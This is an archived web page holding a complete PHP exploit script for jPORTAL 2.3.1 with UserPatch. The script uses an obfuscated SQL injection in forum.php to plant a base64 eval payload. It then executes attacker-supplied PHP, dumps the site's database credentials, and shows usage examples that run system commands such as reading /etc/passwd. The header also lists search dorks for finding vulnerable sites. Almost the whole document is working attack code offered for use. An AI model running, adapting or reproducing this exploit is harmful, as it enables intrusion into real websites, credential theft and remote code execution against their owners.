Home / os / win10

jportal-exec.txt

Posted on 30 December 2007

<?php # # jPORTAL 2.3.1 & UserPatch (forum.php) Remote PHP Code Execution Exploit # # author: irk4z[at]yahoo.pl # http://irk4z.wordpress.com # # # dorks: "powered by jPORTAL 2 & UserPatch" # "powered by jPORTAL 2" # # greetz: str0ke, wacky, polish under :* #---------------------------------------------------------------------> $host = $argv[1]; $path = $argv[2]; $phpcode = $argv[3]; $info = " # ". "# jPORTAL 2.3.1 & UserPatch (forum.php) Remote PHP Code Execution Exploit ". "# ". "# author: irk4z[at]yahoo.pl ". "# http://irk4z.wordpress.com ". "# ". "# ". "# greetz: str0ke, wacky, polish under :* ". "#---------------------------------------------------------------------> "; echo $info; if($argc<4){ echo "# Obsluga: ". "# php host path phpcode ". "# php localhost /~jportal/ phpinfo(); ". "# php localhost /~jportal/ "system('uname -a');" ". "# php localhost /~jportal/ "system('cat /etc/passwd');" ". "# ". "# exploit c0ded by irk4z :D"; die; } $data="do=".base64_encode(base64_decode('Z2xvYmFsICRkYl9ob3N0LCAkZGJfdXNlciwgJGRiX3Bhc3MsICRkYl9uYW1lLCAkcHJlZml4OyANCmVjaG8gIlwkZGJfaG9zdCA9ICckZGJfaG9zdCc7XG4iLg0KIlwkZGJfdXNlciA9ICckZGJfdXNlcic7XG4iLg0KIlwkZGJfcGFzcyA9ICckZGJfcGFzcyc7XG4iLg0KIlwkZGJfbmFtZSA9ICckZGJfbmFtZSc7XG4iLg0KIlwkcHJlZml4ID0gJyRwcmVmaXgnO1xuXG5QSFAgQ09ERSBFWEVDVVRJT04gUkVTVUxUOlxuIjs').$phpcode); $packet = "POST {$path}forum.php?cmd=as_readed&category=18000/**/U%6EION/**/S%65LECT/**/1,2,0x223B6576616C286261736536345F6465636F646528245F504F53545B27646F275D29293B6469653B24746D703D22/* HTTP/1.0 ". "Host: {$host} ". "Content-type: application/x-www-form-urlencoded ". "Content-length: ".strlen($data)." ".$data; $wynik = send($host, 80, $packet); $tmp = strpos($wynik, '$db_host'); if (empty($tmp)){echo " Wystapil blad :( Sprawdz poprawnosc danych wejsciowych.. # exploit c0ded by irk4z :D"; }else{ echo " "; echo "KONFIGURACJA BAZY DANYCH: "; echo substr($wynik, $tmp, strlen($wynik)-$tmp); echo " # exploit c0ded by irk4z :D"; } function send($host, $port, $packet) { $s = @fsockopen($host, $port); if (empty($s)) return; fputs($s, $packet); $retu =''; while(!feof($s)){$retu.=fgets($s);} fclose($s); return $retu; } ?>

 

TOP